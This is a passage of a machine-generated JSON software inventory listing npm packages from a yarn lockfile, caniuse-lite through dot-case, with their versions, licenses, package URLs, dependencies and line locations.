"yarn" }, { "ID": "caniuse-lite@1.0.30001749", "Name": "caniuse-lite", "Identifier": { "PURL": "pkg:npm/caniuse-lite@1.0.30001749", "UID": "f81c8648113ce295" }, "Version": "1.0.30001749", "Licenses": [ "CC-BY-4.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3957, "EndLine": 3960 } ], "AnalyzedBy": "yarn" }, { "ID": "chalk@2.4.2", "Name": "chalk", "Identifier": { "PURL": "pkg:npm/chalk@2.4.2", "UID": "da2266337f7117cd" }, "Version": "2.4.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@3.2.1", "escape-string-regexp@1.0.5", "supports-color@5.5.0" ], "Locations": [ { "StartLine": 3962, "EndLine": 3969 } ], "AnalyzedBy": "yarn" }, { "ID": "chalk@4.1.2", "Name": "chalk", "Identifier": { "PURL": "pkg:npm/chalk@4.1.2", "UID": "526b074f95450f89" }, "Version": "4.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@4.3.0", "supports-color@7.2.0" ], "Locations": [ { "StartLine": 3971, "EndLine": 3977 } ], "AnalyzedBy": "yarn" }, { "ID": "chalk@5.6.2", "Name": "chalk", "Identifier": { "PURL": "pkg:npm/chalk@5.6.2", "UID": "14812de18f462ab2" }, "Version": "5.6.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3979, "EndLine": 3982 } ], "AnalyzedBy": "yarn" }, { "ID": "chownr@1.1.4", "Name": "chownr", "Identifier": { "PURL": "pkg:npm/chownr@1.1.4", "UID": "f7af041634375c52" }, "Version": "1.1.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3989, "EndLine": 3992 } ], "AnalyzedBy": "yarn" }, { "ID": "chownr@3.0.0", "Name": "chownr", "Identifier": { "PURL": "pkg:npm/chownr@3.0.0", "UID": "79f0cad64f409f6c" }, "Version": "3.0.0", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3999, "EndLine": 4002 } ], "AnalyzedBy": "yarn" }, { "ID": "chrome-launcher@0.15.2", "Name": "chrome-launcher", "Identifier": { "PURL": "pkg:npm/chrome-launcher@0.15.2", "UID": "5775017c7e972334" }, "Version": "0.15.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/node@24.7.0", "escape-string-regexp@4.0.0", "is-wsl@2.2.0", "lighthouse-logger@1.4.2" ], "Locations": [ { "StartLine": 4004, "EndLine": 4012 } ], "AnalyzedBy": "yarn" }, { "ID": "chromium-edge-launcher@0.2.0", "Name": "chromium-edge-launcher", "Identifier": { "PURL": "pkg:npm/chromium-edge-launcher@0.2.0", "UID": "ca15428cda31f4d" }, "Version": "0.2.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/node@24.7.0", "escape-string-regexp@4.0.0", "is-wsl@2.2.0", "lighthouse-logger@1.4.2", "mkdirp@1.0.4", "rimraf@3.0.2" ], "Locations": [ { "StartLine": 4014, "EndLine": 4024 } ], "AnalyzedBy": "yarn" }, { "ID": "ci-info@2.0.0", "Name": "ci-info", "Identifier": { "PURL": "pkg:npm/ci-info@2.0.0", "UID": "9667656c8ff1fce7" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4026, "EndLine": 4029 } ], "AnalyzedBy": "yarn" }, { "ID": "ci-info@3.9.0", "Name": "ci-info", "Identifier": { "PURL": "pkg:npm/ci-info@3.9.0", "UID": "ee8aab342e27132f" }, "Version": "3.9.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4031, "EndLine": 4034 } ], "AnalyzedBy": "yarn" }, { "ID": "ci-info@4.3.1", "Name": "ci-info", "Identifier": { "PURL": "pkg:npm/ci-info@4.3.1", "UID": "ae81f984675175b0" }, "Version": "4.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4036, "EndLine": 4037 } ], "AnalyzedBy": "yarn" }, { "ID": "cidr-regex@5.0.1", "Name": "cidr-regex", "Identifier": { "PURL": "pkg:npm/cidr-regex@5.0.1", "UID": "7eb12cd1ec18776a" }, "Version": "5.0.1", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ip-regex@5.0.0" ], "Locations": [ { "StartLine": 4039, "EndLine": 4042 } ], "AnalyzedBy": "yarn" }, { "ID": "cli-columns@4.0.0", "Name": "cli-columns", "Identifier": { "PURL": "pkg:npm/cli-columns@4.0.0", "UID": "c1cdceccd66c779d" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 4054, "EndLine": 4058 } ], "AnalyzedBy": "yarn" }, { "ID": "cli-cursor@3.1.0", "Name": "cli-cursor", "Identifier": { "PURL": "pkg:npm/cli-cursor@3.1.0", "UID": "7fd6fdb2ac38e917" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "restore-cursor@3.1.0" ], "Locations": [ { "StartLine": 4060, "EndLine": 4065 } ], "AnalyzedBy": "yarn" }, { "ID": "cli-spinners@2.9.2", "Name": "cli-spinners", "Identifier": { "PURL": "pkg:npm/cli-spinners@2.9.2", "UID": "c6224309aac7f1d" }, "Version": "2.9.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4067, "EndLine": 4070 } ], "AnalyzedBy": "yarn" }, { "ID": "cliui@7.0.4", "Name": "cliui", "Identifier": { "PURL": "pkg:npm/cliui@7.0.4", "UID": "35cff7c054565126" }, "Version": "7.0.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3", "strip-ansi@6.0.1", "wrap-ansi@7.0.0" ], "Locations": [ { "StartLine": 4081, "EndLine": 4088 } ], "AnalyzedBy": "yarn" }, { "ID": "cliui@8.0.1", "Name": "cliui", "Identifier": { "PURL": "pkg:npm/cliui@8.0.1", "UID": "4d144a22469cfbaa" }, "Version": "8.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3", "strip-ansi@6.0.1", "wrap-ansi@7.0.0" ], "Locations": [ { "StartLine": 4090, "EndLine": 4097 } ], "AnalyzedBy": "yarn" }, { "ID": "clone@1.0.4", "Name": "clone", "Identifier": { "PURL": "pkg:npm/clone@1.0.4", "UID": "609c6d98d3ba080b" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4099, "EndLine": 4102 } ], "AnalyzedBy": "yarn" }, { "ID": "cmd-shim@7.0.0", "Name": "cmd-shim", "Identifier": { "PURL": "pkg:npm/cmd-shim@7.0.0", "UID": "daaeba5e74b8f600" }, "Version": "7.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4104, "EndLine": 4105 } ], "AnalyzedBy": "yarn" }, { "ID": "code-point-at@1.1.0", "Name": "code-point-at", "Identifier": { "PURL": "pkg:npm/code-point-at@1.1.0", "UID": "28a455c43ef757d7" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4112, "EndLine": 4115 } ], "AnalyzedBy": "yarn" }, { "ID": "color@3.2.1", "Name": "color", "Identifier": { "PURL": "pkg:npm/color@3.2.1", "UID": "b5d61b1fe46e572d" }, "Version": "3.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-convert@1.9.3", "color-string@1.9.1" ], "Locations": [ { "StartLine": 4191, "EndLine": 4197 } ], "AnalyzedBy": "yarn" }, { "ID": "color@4.2.3", "Name": "color", "Identifier": { "PURL": "pkg:npm/color@4.2.3", "UID": "5ff2b5275c988769" }, "Version": "4.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-convert@2.0.1", "color-string@1.9.1" ], "Locations": [ { "StartLine": 4199, "EndLine": 4205 } ], "AnalyzedBy": "yarn" }, { "ID": "color-convert@1.9.3", "Name": "color-convert", "Identifier": { "PURL": "pkg:npm/color-convert@1.9.3", "UID": "9a6bc06041fada1b" }, "Version": "1.9.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@1.1.3" ], "Locations": [ { "StartLine": 4129, "EndLine": 4134 } ], "AnalyzedBy": "yarn" }, { "ID": "color-convert@2.0.1", "Name": "color-convert", "Identifier": { "PURL": "pkg:npm/color-convert@2.0.1", "UID": "fb176e30d2d920a6" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@1.1.4" ], "Locations": [ { "StartLine": 4136, "EndLine": 4141 } ], "AnalyzedBy": "yarn" }, { "ID": "color-name@1.1.3", "Name": "color-name", "Identifier": { "PURL": "pkg:npm/color-name@1.1.3", "UID": "b29caa2ee2bf2b7" }, "Version": "1.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4153, "EndLine": 4156 } ], "AnalyzedBy": "yarn" }, { "ID": "color-name@1.1.4", "Name": "color-name", "Identifier": { "PURL": "pkg:npm/color-name@1.1.4", "UID": "b6888d817f2787bd" }, "Version": "1.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4143, "EndLine": 4146 } ], "AnalyzedBy": "yarn" }, { "ID": "color-name@2.0.2", "Name": "color-name", "Identifier": { "PURL": "pkg:npm/color-name@2.0.2", "UID": "b4259ec1bec03ac5" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4148, "EndLine": 4151 } ], "AnalyzedBy": "yarn" }, { "ID": "color-parse@2.0.2", "Name": "color-parse", "Identifier": { "PURL": "pkg:npm/color-parse@2.0.2", "UID": "89485a6bdc5390bc" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@2.0.2" ], "Locations": [ { "StartLine": 4158, "EndLine": 4163 } ], "AnalyzedBy": "yarn" }, { "ID": "color-rgba@3.0.0", "Name": "color-rgba", "Identifier": { "PURL": "pkg:npm/color-rgba@3.0.0", "UID": "5384ce812ae48299" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-parse@2.0.2", "color-space@2.3.2" ], "Locations": [ { "StartLine": 4165, "EndLine": 4171 } ], "AnalyzedBy": "yarn" }, { "ID": "color-space@2.3.2", "Name": "color-space", "Identifier": { "PURL": "pkg:npm/color-space@2.3.2", "UID": "c1616d97b119ee6d" }, "Version": "2.3.2", "Licenses": [ "Unlicense" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4173, "EndLine": 4176 } ], "AnalyzedBy": "yarn" }, { "ID": "color-string@1.9.1", "Name": "color-string", "Identifier": { "PURL": "pkg:npm/color-string@1.9.1", "UID": "8e29a89347e24753" }, "Version": "1.9.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@1.1.4", "simple-swizzle@0.2.4" ], "Locations": [ { "StartLine": 4178, "EndLine": 4184 } ], "AnalyzedBy": "yarn" }, { "ID": "combined-stream@1.0.8", "Name": "combined-stream", "Identifier": { "PURL": "pkg:npm/combined-stream@1.0.8", "UID": "7ef3f3d5a1f30dbe" }, "Version": "1.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "delayed-stream@1.0.0" ], "Locations": [ { "StartLine": 4212, "EndLine": 4217 } ], "AnalyzedBy": "yarn" }, { "ID": "commander@12.1.0", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@12.1.0", "UID": "ce60549c9cf6e12b" }, "Version": "12.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4224, "EndLine": 4227 } ], "AnalyzedBy": "yarn" }, { "ID": "commander@13.1.0", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@13.1.0", "UID": "cf65fc28e03b7a0" }, "Version": "13.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4229, "EndLine": 4232 } ], "AnalyzedBy": "yarn" }, { "ID": "commander@2.20.3", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@2.20.3", "UID": "cac66995b8514ca9" }, "Version": "2.20.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4234, "EndLine": 4237 } ], "AnalyzedBy": "yarn" }, { "ID": "commander@7.2.0", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@7.2.0", "UID": "3fa9856e38f84954" }, "Version": "7.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4239, "EndLine": 4242 } ], "AnalyzedBy": "yarn" }, { "ID": "common-ancestor-path@1.0.1", "Name": "common-ancestor-path", "Identifier": { "PURL": "pkg:npm/common-ancestor-path@1.0.1", "UID": "23be4cd22832fdb4" }, "Version": "1.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4249, "EndLine": 4250 } ], "AnalyzedBy": "yarn" }, { "ID": "concat-map@0.0.1", "Name": "concat-map", "Identifier": { "PURL": "pkg:npm/concat-map@0.0.1", "UID": "37f2f832010da5e6" }, "Version": "0.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4272, "EndLine": 4275 } ], "AnalyzedBy": "yarn" }, { "ID": "connect@3.7.0", "Name": "connect", "Identifier": { "PURL": "pkg:npm/connect@3.7.0", "UID": "24785918da4a1614" }, "Version": "3.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@2.6.9", "finalhandler@1.1.2", "parseurl@1.3.3", "utils-merge@1.0.1" ], "Locations": [ { "StartLine": 4277, "EndLine": 4285 } ], "AnalyzedBy": "yarn" }, { "ID": "console-control-strings@1.1.0", "Name": "console-control-strings", "Identifier": { "PURL": "pkg:npm/console-control-strings@1.1.0", "UID": "a84d5ff2c4bac0d0" }, "Version": "1.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4287, "EndLine": 4290 } ], "AnalyzedBy": "yarn" }, { "ID": "convert-source-map@2.0.0", "Name": "convert-source-map", "Identifier": { "PURL": "pkg:npm/convert-source-map@2.0.0", "UID": "b2837bdb1861eb5" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4297, "EndLine": 4300 } ], "AnalyzedBy": "yarn" }, { "ID": "core-js@1.2.7", "Name": "core-js", "Identifier": { "PURL": "pkg:npm/core-js@1.2.7", "UID": "aec58b8e1e146b0d" }, "Version": "1.2.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4309, "EndLine": 4312 } ], "AnalyzedBy": "yarn" }, { "ID": "core-util-is@1.0.3", "Name": "core-util-is", "Identifier": { "PURL": "pkg:npm/core-util-is@1.0.3", "UID": "23141bcce8e9a469" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4314, "EndLine": 4317 } ], "AnalyzedBy": "yarn" }, { "ID": "cosmiconfig@8.3.6", "Name": "cosmiconfig", "Identifier": { "PURL": "pkg:npm/cosmiconfig@8.3.6", "UID": "69adb9e24fe3bf1d" }, "Version": "8.3.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "import-fresh@3.3.1", "js-yaml@4.1.0", "parse-json@5.2.0", "path-type@4.0.0" ], "Locations": [ { "StartLine": 4319, "EndLine": 4327 } ], "AnalyzedBy": "yarn" }, { "ID": "cross-spawn@7.0.6", "Name": "cross-spawn", "Identifier": { "PURL": "pkg:npm/cross-spawn@7.0.6", "UID": "f8d5dfd82ca4836c" }, "Version": "7.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "path-key@3.1.1", "shebang-command@2.0.0", "which@2.0.2" ], "Locations": [ { "StartLine": 4352, "EndLine": 4359 } ], "AnalyzedBy": "yarn" }, { "ID": "css-color-keywords@1.0.0", "Name": "css-color-keywords", "Identifier": { "PURL": "pkg:npm/css-color-keywords@1.0.0", "UID": "af36e1a6d2d209e0" }, "Version": "1.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4361, "EndLine": 4364 } ], "AnalyzedBy": "yarn" }, { "ID": "css-line-break@2.1.0", "Name": "css-line-break", "Identifier": { "PURL": "pkg:npm/css-line-break@2.1.0", "UID": "4598245b64d2d21e" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "utrie@1.0.2" ], "Locations": [ { "StartLine": 4366, "EndLine": 4371 } ], "AnalyzedBy": "yarn" }, { "ID": "css-select@5.2.2", "Name": "css-select", "Identifier": { "PURL": "pkg:npm/css-select@5.2.2", "UID": "2c9ef9fb87d1c1c7" }, "Version": "5.2.2", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "boolbase@1.0.0", "css-what@6.2.2", "domhandler@5.0.3", "domutils@3.2.2", "nth-check@2.1.1" ], "Locations": [ { "StartLine": 4373, "EndLine": 4382 } ], "AnalyzedBy": "yarn" }, { "ID": "css-to-react-native@3.2.0", "Name": "css-to-react-native", "Identifier": { "PURL": "pkg:npm/css-to-react-native@3.2.0", "UID": "6af2895e2f65e101" }, "Version": "3.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "camelize@1.0.1", "css-color-keywords@1.0.0", "postcss-value-parser@4.2.0" ], "Locations": [ { "StartLine": 4384, "EndLine": 4391 } ], "AnalyzedBy": "yarn" }, { "ID": "css-tree@1.1.3", "Name": "css-tree", "Identifier": { "PURL": "pkg:npm/css-tree@1.1.3", "UID": "646cd58c47821057" }, "Version": "1.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mdn-data@2.0.14", "source-map@0.6.1" ], "Locations": [ { "StartLine": 4393, "EndLine": 4399 } ], "AnalyzedBy": "yarn" }, { "ID": "css-tree@2.2.1", "Name": "css-tree", "Identifier": { "PURL": "pkg:npm/css-tree@2.2.1", "UID": "4fe2005f6811d0c2" }, "Version": "2.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mdn-data@2.0.28", "source-map-js@1.2.1" ], "Locations": [ { "StartLine": 4409, "EndLine": 4415 } ], "AnalyzedBy": "yarn" }, { "ID": "css-tree@2.3.1", "Name": "css-tree", "Identifier": { "PURL": "pkg:npm/css-tree@2.3.1", "UID": "5b8f0edcb9f0b00d" }, "Version": "2.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mdn-data@2.0.30", "source-map-js@1.2.1" ], "Locations": [ { "StartLine": 4401, "EndLine": 4407 } ], "AnalyzedBy": "yarn" }, { "ID": "css-what@6.2.2", "Name": "css-what", "Identifier": { "PURL": "pkg:npm/css-what@6.2.2", "UID": "109907ed858e48e9" }, "Version": "6.2.2", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4417, "EndLine": 4420 } ], "AnalyzedBy": "yarn" }, { "ID": "cssesc@3.0.0", "Name": "cssesc", "Identifier": { "PURL": "pkg:npm/cssesc@3.0.0", "UID": "d4c72b9c20dc2e14" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4422, "EndLine": 4425 } ], "AnalyzedBy": "yarn" }, { "ID": "csso@5.0.5", "Name": "csso", "Identifier": { "PURL": "pkg:npm/csso@5.0.5", "UID": "fcfa82f12c163c9e" }, "Version": "5.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "css-tree@2.2.1" ], "Locations": [ { "StartLine": 4427, "EndLine": 4432 } ], "AnalyzedBy": "yarn" }, { "ID": "debug@2.6.9", "Name": "debug", "Identifier": { "PURL": "pkg:npm/debug@2.6.9", "UID": "941415b7bcc27f1e" }, "Version": "2.6.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ms@2.0.0" ], "Locations": [ { "StartLine": 4485, "EndLine": 4490 } ], "AnalyzedBy": "yarn" }, { "ID": "debug@4.4.3", "Name": "debug", "Identifier": { "PURL": "pkg:npm/debug@4.4.3", "UID": "f96e8fd29dd51c9a" }, "Version": "4.4.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ms@2.1.3" ], "Locations": [ { "StartLine": 4478, "EndLine": 4483 } ], "AnalyzedBy": "yarn" }, { "ID": "decamelize@1.2.0", "Name": "decamelize", "Identifier": { "PURL": "pkg:npm/decamelize@1.2.0", "UID": "f54ceb07c132b039" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4500, "EndLine": 4503 } ], "AnalyzedBy": "yarn" }, { "ID": "decamelize-keys@1.1.1", "Name": "decamelize-keys", "Identifier": { "PURL": "pkg:npm/decamelize-keys@1.1.1", "UID": "93680595f4609ac8" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "decamelize@1.2.0", "map-obj@1.0.1" ], "Locations": [ { "StartLine": 4492, "EndLine": 4498 } ], "AnalyzedBy": "yarn" }, { "ID": "decode-uri-component@0.2.2", "Name": "decode-uri-component", "Identifier": { "PURL": "pkg:npm/decode-uri-component@0.2.2", "UID": "a63ffa3913e5025a" }, "Version": "0.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4505, "EndLine": 4508 } ], "AnalyzedBy": "yarn" }, { "ID": "decompress-response@6.0.0", "Name": "decompress-response", "Identifier": { "PURL": "pkg:npm/decompress-response@6.0.0", "UID": "4306e036c090406e" }, "Version": "6.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mimic-response@3.1.0" ], "Locations": [ { "StartLine": 4510, "EndLine": 4515 } ], "AnalyzedBy": "yarn" }, { "ID": "deep-extend@0.6.0", "Name": "deep-extend", "Identifier": { "PURL": "pkg:npm/deep-extend@0.6.0", "UID": "84cd415aa8b2b546" }, "Version": "0.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4522, "EndLine": 4525 } ], "AnalyzedBy": "yarn" }, { "ID": "deepmerge@3.3.0", "Name": "deepmerge", "Identifier": { "PURL": "pkg:npm/deepmerge@3.3.0", "UID": "36fe3eafa47a1273" }, "Version": "3.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4532, "EndLine": 4535 } ], "AnalyzedBy": "yarn" }, { "ID": "deepmerge@4.3.1", "Name": "deepmerge", "Identifier": { "PURL": "pkg:npm/deepmerge@4.3.1", "UID": "1d5fdb5e4f0a2a5f" }, "Version": "4.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4537, "EndLine": 4540 } ], "AnalyzedBy": "yarn" }, { "ID": "defaults@1.0.4", "Name": "defaults", "Identifier": { "PURL": "pkg:npm/defaults@1.0.4", "UID": "e54859122b20c968" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "clone@1.0.4" ], "Locations": [ { "StartLine": 4542, "EndLine": 4547 } ], "AnalyzedBy": "yarn" }, { "ID": "define-data-property@1.1.4", "Name": "define-data-property", "Identifier": { "PURL": "pkg:npm/define-data-property@1.1.4", "UID": "ed1df82c7bb28e2b" }, "Version": "1.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-define-property@1.0.1", "es-errors@1.3.0", "gopd@1.2.0" ], "Locations": [ { "StartLine": 4549, "EndLine": 4556 } ], "AnalyzedBy": "yarn" }, { "ID": "delayed-stream@1.0.0", "Name": "delayed-stream", "Identifier": { "PURL": "pkg:npm/delayed-stream@1.0.0", "UID": "bb3961b6fcff1b4" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4567, "EndLine": 4570 } ], "AnalyzedBy": "yarn" }, { "ID": "delegates@1.0.0", "Name": "delegates", "Identifier": { "PURL": "pkg:npm/delegates@1.0.0", "UID": "3c3cbb90c45c5698" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4572, "EndLine": 4575 } ], "AnalyzedBy": "yarn" }, { "ID": "depd@2.0.0", "Name": "depd", "Identifier": { "PURL": "pkg:npm/depd@2.0.0", "UID": "99d5df616914c5bf" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4577, "EndLine": 4580 } ], "AnalyzedBy": "yarn" }, { "ID": "destroy@1.2.0", "Name": "destroy", "Identifier": { "PURL": "pkg:npm/destroy@1.2.0", "UID": "58552c2eb23e6bd6" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4591, "EndLine": 4594 } ], "AnalyzedBy": "yarn" }, { "ID": "detect-indent@6.1.0", "Name": "detect-indent", "Identifier": { "PURL": "pkg:npm/detect-indent@6.1.0", "UID": "5a71346f76404511" }, "Version": "6.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4596, "EndLine": 4599 } ], "AnalyzedBy": "yarn" }, { "ID": "detect-libc@2.1.2", "Name": "detect-libc", "Identifier": { "PURL": "pkg:npm/detect-libc@2.1.2", "UID": "4295fee1cc3f0edb" }, "Version": "2.1.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4601, "EndLine": 4604 } ], "AnalyzedBy": "yarn" }, { "ID": "diff@8.0.2", "Name": "diff", "Identifier": { "PURL": "pkg:npm/diff@8.0.2", "UID": "e499c88b2fc9c33d" }, "Version": "8.0.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4616, "EndLine": 4617 } ], "AnalyzedBy": "yarn" }, { "ID": "dom-serializer@2.0.0", "Name": "dom-serializer", "Identifier": { "PURL": "pkg:npm/dom-serializer@2.0.0", "UID": "5ed2e8d976eef47b" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "domelementtype@2.3.0", "domhandler@5.0.3", "entities@4.5.0" ], "Locations": [ { "StartLine": 4640, "EndLine": 4647 } ], "AnalyzedBy": "yarn" }, { "ID": "domelementtype@2.3.0", "Name": "domelementtype", "Identifier": { "PURL": "pkg:npm/domelementtype@2.3.0", "UID": "bf7273cf9dbcf2c3" }, "Version": "2.3.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4649, "EndLine": 4652 } ], "AnalyzedBy": "yarn" }, { "ID": "domhandler@5.0.3", "Name": "domhandler", "Identifier": { "PURL": "pkg:npm/domhandler@5.0.3", "UID": "587c5daaf01d54d5" }, "Version": "5.0.3", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "domelementtype@2.3.0" ], "Locations": [ { "StartLine": 4654, "EndLine": 4659 } ], "AnalyzedBy": "yarn" }, { "ID": "domutils@3.2.2", "Name": "domutils", "Identifier": { "PURL": "pkg:npm/domutils@3.2.2", "UID": "d2bb43a799e267ed" }, "Version": "3.2.2", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "dom-serializer@2.0.0", "domelementtype@2.3.0", "domhandler@5.0.3" ], "Locations": [ { "StartLine": 4661, "EndLine": 4668 } ], "AnalyzedBy": "yarn" }, { "ID": "dooboolab-welcome@1.3.2", "Name": "dooboolab-welcome", "Identifier": { "PURL": "pkg:npm/dooboolab-welcome@1.3.2", "UID": "2e82cd394dab7a43" }, "Version": "1.3.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4670, "EndLine": 4673 } ], "AnalyzedBy": "yarn" }, { "ID": "dot-case@3.0.4", "Name": "dot-case", "Identifier": { "PURL": "pkg:npm/dot-case@3.0.4", "UID": "8ae8a08b8383edc6" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "no-case@3.0.4", "tslib@2.8.1" ], "Locations": [ { "StartLine": 4675, "EndLine": 4681 } ], "AnalyzedBy": "yarn" 